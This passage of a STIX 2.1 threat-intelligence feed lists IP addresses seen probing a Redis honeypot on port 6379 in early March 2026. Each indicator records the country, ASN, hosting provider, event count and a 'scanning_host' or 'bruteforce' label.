      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--84d50f47-1248-41b8-a4ca-0b48b1402f61",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T14:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.219.1.233']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T14:25:06.000Z",
      "valid_until": "2026-04-02T14:25:05.000Z"
    },
    {
      "created": "2026-03-01T14:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; cats=Misc activity,Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--59ba6205-4dfa-4873-a6fa-399c576b880b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T14:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '80.94.93.5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T14:25:06.000Z",
      "valid_until": "2026-04-02T14:25:05.000Z"
    },
    {
      "created": "2026-03-01T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0c545b8c-ec8b-4051-abb3-e8cfb8dc81eb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '134.122.7.186']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T16:25:13.000Z",
      "valid_until": "2026-04-02T16:25:12.000Z"
    },
    {
      "created": "2026-03-01T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--425d5f6b-cff6-43ca-a615-fb409c955544",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.248.133.126']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T16:25:13.000Z",
      "valid_until": "2026-04-02T16:25:12.000Z"
    },
    {
      "created": "2026-03-01T17:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0",
      "id": "indicator--9243f9a2-9c69-4645-bb2e-80f5c669de02",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T17:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '114.80.35.241']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T17:25:14.000Z",
      "valid_until": "2026-04-02T17:25:13.000Z"
    },
    {
      "created": "2026-03-01T17:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=27; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--e482bcba-4809-4b02-97ab-175d683befe1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T17:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '85.11.183.21']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T17:25:14.000Z",
      "valid_until": "2026-04-02T17:25:13.000Z"
    },
    {
      "created": "2026-03-01T18:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--e85c4b06-bf8d-404a-8ea8-2f07b823d4b9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T18:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.206.108.14']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T18:25:12.000Z",
      "valid_until": "2026-04-02T18:25:11.000Z"
    },
    {
      "created": "2026-03-01T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=135089; asn_org=China Telecom; redis_cmd_hits=0",
      "id": "indicator--1a456dab-2fc6-46c4-b000-96f6fbff7118",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '183.56.243.176']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T21:25:13.000Z",
      "valid_until": "2026-04-02T21:25:12.000Z"
    },
    {
      "created": "2026-03-01T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--1f0d0881-3504-4527-b351-c8c7539220a8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T21:25:13.000Z",
      "valid_until": "2026-04-02T21:25:12.000Z"
    },
    {
      "created": "2026-03-01T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--d596c357-a24d-449d-9474-3a195e2881d4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.175.198.133']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T21:25:13.000Z",
      "valid_until": "2026-04-02T21:25:12.000Z"
    },
    {
      "created": "2026-03-01T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0",
      "id": "indicator--46976204-a006-462a-ae61-8a4708adc5ef",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '34.125.43.63']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T21:25:13.000Z",
      "valid_until": "2026-04-02T21:25:12.000Z"
    },
    {
      "created": "2026-03-01T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmd_hits=0",
      "id": "indicator--891b1970-f62e-488f-8a0f-03dd7f236d1c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '43.131.42.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T21:25:13.000Z",
      "valid_until": "2026-04-02T21:25:12.000Z"
    },
    {
      "created": "2026-03-01T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--90e2652a-132b-48b2-a2a6-447d6f3278f5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '39.105.163.176']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T22:25:13.000Z",
      "valid_until": "2026-04-02T22:25:12.000Z"
    },
    {
      "created": "2026-03-01T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--6a774260-42c8-45de-a2bd-ed00e4878fd7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '120.205.80.220']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T23:25:13.000Z",
      "valid_until": "2026-04-02T23:25:12.000Z"
    },
    {
      "created": "2026-03-02T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d73f0457-298f-4b4c-a8dc-06149a227316",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '161.35.120.3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T00:25:13.000Z",
      "valid_until": "2026-04-03T00:25:12.000Z"
    },
    {
      "created": "2026-03-02T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=136195; asn_org=Qingdao, Shandong Province, P.R.China.; redis_cmd_hits=0",
      "id": "indicator--479700b0-061f-4dd5-b0b7-372c097a7c1e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.40.103.253']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T00:25:13.000Z",
      "valid_until": "2026-04-03T00:25:12.000Z"
    },
    {
      "created": "2026-03-02T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--5e1e0133-977e-4692-8c5d-7e76402e0a84",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.91']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T00:25:13.000Z",
      "valid_until": "2026-04-03T00:25:12.000Z"
    },
    {
      "created": "2026-03-02T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--4649b435-48c3-486d-8d48-19f8afc8f5a4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.185.213.71']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T00:25:13.000Z",
      "valid_until": "2026-04-03T00:25:12.000Z"
    },
    {
      "created": "2026-03-02T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CA; asn=852; asn_org=TELUS Communications; redis_cmd_hits=0",
      "id": "indicator--962a77f1-d1ae-4be7-b028-04bcc801c76d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.183.91.30']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T00:25:13.000Z",
      "valid_until": "2026-04-03T00:25:12.000Z"
    },
    {
      "created": "2026-03-02T01:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--60e608f4-fe3e-4069-bcf2-df607a3f398d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T01:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.12.184.7']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T01:25:12.000Z",
      "valid_until": "2026-04-03T01:25:12.000Z"
    },
    {
      "created": "2026-03-02T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--cb5c7e53-f8f0-436d-9d81-80427400823d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.169.81.111']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T02:25:13.000Z",
      "valid_until": "2026-04-03T02:25:12.000Z"
    },
    {
      "created": "2026-03-02T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--f450d3a4-b6a0-461d-9b9f-6902b1ca613f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.142.125.215']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T03:25:13.000Z",
      "valid_until": "2026-04-03T03:25:12.000Z"
    },
    {
      "created": "2026-03-02T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--b8f229b7-6a23-4633-911b-a820b145bf0a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.50.17.159']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T04:25:13.000Z",
      "valid_until": "2026-04-03T04:25:13.000Z"
    },
    {
      "created": "2026-03-02T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=134238; asn_org=CHINANET Jiangx province IDC network; redis_cmd_hits=0",
      "id": "indicator--1638aade-2a1b-4ebe-af20-d0e5d1a3c1fe",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.227.11.236']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T04:25:13.000Z",
      "valid_until": "2026-04-03T04:25:13.000Z"
    },
    {
      "created": "2026-03-02T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--b2cadc4b-781d-43e2-8e47-a44710162b35",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.78']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T04:25:13.000Z",
      "valid_until": "2026-04-03T04:25:13.000Z"
    },
    {
      "created": "2026-03-02T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--9c822a0a-3bc4-42ce-83fd-887b73999867",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.227.106.112']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T04:25:13.000Z",
      "valid_until": "2026-04-03T04:25:13.000Z"
    },
    {
      "created": "2026-03-02T05:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=VN; asn=153651; asn_org=QPPF Company Limited; redis_cmd_hits=0",
      "id": "indicator--ea74e312-b9ec-495b-aab9-248fe350e48b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T05:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '163.223.13.184']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T05:25:12.000Z",
      "valid_until": "2026-04-03T05:25:11.000Z"
    },
    {
      "created": "2026-03-02T05:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=99; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"SSH-2.0-Go  \"",
      "id": "indicator--cbae1715-03f1-4b03-9c28-42ca1b21b690",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T05:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.218.118.203']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T05:25:12.000Z",
      "valid_until": "2026-04-03T05:25:11.000Z"
    },
    {
      "created": "2026-03-02T05:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--3296db63-ee92-429d-90a4-d21591eddbff",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T05:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '4.174.178.51']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T05:25:12.000Z",
      "valid_until": "2026-04-03T05:25:11.000Z"
    },
    {
      "created": "2026-03-02T06:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=24; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--4a9041e0-3a44-476a-8370-2a323523bea3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T06:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.65.194.81']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T06:25:06.000Z",
      "valid_until": "2026-04-03T06:25:05.000Z"
    },
    {
      "created": "2026-03-02T06:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--66850bf9-1b07-43d0-95e4-75db418202ce",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T06:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '61.242.178.28']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T06:25:06.000Z",
      "valid_until": "2026-04-03T06:25:05.000Z"
    },
    {
      "created": "2026-03-02T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0f72f59a-206e-4895-b55f-9a8eb4fc765b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '138.197.207.198']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T07:25:13.000Z",
      "valid_until": "2026-04-03T07:25:12.000Z"
    },
    {
      "created": "2026-03-02T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0",
      "id": "indicator--334bd556-c1cf-4999-bb41-2e6c4b7d0404",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.180.141.37']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T07:25:13.000Z",
      "valid_until": "2026-04-03T07:25:12.000Z"
    },
    {
      "created": "2026-03-02T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0",
      "id": "indicator--a3efab27-f3cc-4949-92cc-8034b8d756ec",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.180.141.39']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T07:25:13.000Z",
      "valid_until": "2026-04-03T07:25:12.000Z"
    },
    {
      "created": "2026-03-02T08:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--c227d013-9a30-4c31-a7fe-8f274484d2dd",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T08:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.169.91.42']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T08:25:03.000Z",
      "valid_until": "2026-04-03T08:25:01.000Z"
    },
    {
      "created": "2026-03-02T08:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=40676; asn_org=Psychz Networks; redis_cmd_hits=0",
      "id": "indicator--076a4376-e176-478f-b857-3a1ba0359bdd",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T08:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '207.231.108.199']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T08:25:03.000Z",
      "valid_until": "2026-04-03T08:25:01.000Z"
    },
    {
      "created": "2026-03-02T08:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; redis_cmd_hits=0",
      "id": "indicator--5b1ed4aa-c0a7-419e-a2c5-f6b206da1763",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T08:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '221.130.29.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T08:25:03.000Z",
      "valid_until": "2026-04-03T08:25:01.000Z"
    },
    {
      "created": "2026-03-02T09:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--19f1ddd7-1d03-4e27-80df-9b88e47bd397",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T09:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.142.178.14']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T09:25:06.000Z",
      "valid_until": "2026-04-03T09:25:05.000Z"
    },
    {
      "created": "2026-03-02T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=26496; asn_org=GoDaddy.com, LLC; redis_cmd_hits=0",
      "id": "indicator--7d9fb1f9-5917-42d8-849b-c1ed5beb15b4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '68.178.168.233']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T10:25:13.000Z",
      "valid_until": "2026-04-03T10:25:12.000Z"
    },
    {
      "created": "2026-03-02T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--6737886a-c59d-4d19-ad2d-14abafe16f71",
      "labels": [
        "bruteforce"
      ],
